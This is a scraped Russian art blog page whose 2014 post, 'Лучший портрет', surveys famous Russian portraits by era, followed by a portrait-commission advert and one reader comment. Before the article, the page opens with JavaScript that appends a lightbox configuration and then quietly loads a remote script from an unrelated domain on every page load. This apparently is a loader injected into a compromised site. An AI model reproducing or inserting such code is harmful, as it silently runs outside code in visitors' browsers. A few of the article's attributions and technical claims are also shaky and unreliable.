, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Лучший портрет

Автор: Дмитрий Алмазов | 14 Мар 2014

Лучший портретЧто такое лучший портрет? Может быть, это изображение любимой женщины или дочки? Может быть, изображение главы собственной страны? Или это изображение коллеги по художественному цеху? Для каждого этапов развития искусства лучшим становились те работы, которые соответствовали временным направлениям. Так давайте разбираемся, что же такое лучший портрет.

В эпоху классицизма и романтизма лучшим портретом являлся портрет женщины. Основные представители – это портрет А.П.Струйской  и портрет Екатерины Второй работы Рокотова, портрет графини Софьи Дмитриевны работы  Головачевского, портрет Е.Н.Тишининой художника Березина, портрет М.И.Лопухиной Боровиковского. На всех этих полотнах можно увидеть и любимую женщину, и музу, и светскую даму, и маленькую девочку. На холстах присутствуют холодные тона, четкие очертания, многочисленность мельчайших деталей, пышная природа в противопоставлении богатой красоте модели. Увидеть данные работы вы сможете в Третьяковской галерее и Эрмитаже.

Лучший портретВ эпоху реализма  портрет с дамами  сдает свои позиции (подробнее о женском портрете вы можете прочитать в статье " женский портрет"). «На трон лучших портретов» взошли изображения министров, императоров и друзей-художников. Примером могут вот эти полотна: портрет Репина художника Серова,  портрет Петра Кончаловского также работы Серова, портрет Александра третьего работы Крамского, портрет Плеве работы Репина. В реализм врывается свежий ветер теплых тонов, которые эклектируют с холодными. Появляется новая пропись: тонкие, вязкие, линии сочетаются с массивными деталями. Из-за новой техники полотна стали безумно яркими и стойкими ко всем условиям. Если в музее увидите работы эпоху реализма, то сложится ощущение, что картина написана вчера, а не 150 лет назад. Все вышеперечисленные работы являются достоянием нашей культуры. Вы сможете их увидеть в Третьяковской галерее и Русском музее.

Лучший портретВ эпоху авангардистской  России лучшими портретами становятся и портреты муз, и художников-друзей, и писателей, и певцов. Основными представителями этого времени являются: «Женщина с гитарой» работы Лентулова, портрет неизвестного артиста работы Татлина, портрет художника Г. Б. Якулова работы Кончаловского, портрет Шаляпина работы Кустодиева, портрет артистки Н. И. Забелы-Врубель работы ее мужа Врубеля, Портрет артиста Тягунова работы Давида Бурлюка. В авангардизме открылось буйство красок, царство полутонов, первозданность изображения. Все они  передают моделей в полном величии. Если это муза, то она в символизме - красочная, таинственная, завораживающая. Если певец или писатель, то он в неореализме - насыщенный, своеобразный. Если друг-художник, то он в фовизме - самобытный, но настоящий. Посмотреть эти полотна вы сможете в Третьяковской галерее на Крымском Валу.

В заключении стоит сказать, что время само определяет лучший портрет. Чтобы узнать, что станет единственным и лучшим, нужно лишь немного подождать.

Заказать портрет Вы можете у наших профессиональных художников, которые сделают лучший портрет именно для Вас! Оставить заявку можно на странице контакты или по телефону 8(960)134-46-27(г. Воронеж)

Темы: Портрет, Школа искусства, о Живописи | 1 отзыв »

Один отзыв на “Лучший портрет”

  1. Елена пишет:
    23 Мар 2014 в 16:24

    Не бывает единолично портретов «лучших», поскольку, как говорят, сколько людей, столько и мнений. Поэтому можно с полной уверенностью сказать, что самый лучший портрет, он у каждого человека свой. У нас могут совпадать вкусы, мы можем восхищаться одними и теми же произведениями, но самое сокровенное, самое лучшее у каждого свое.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress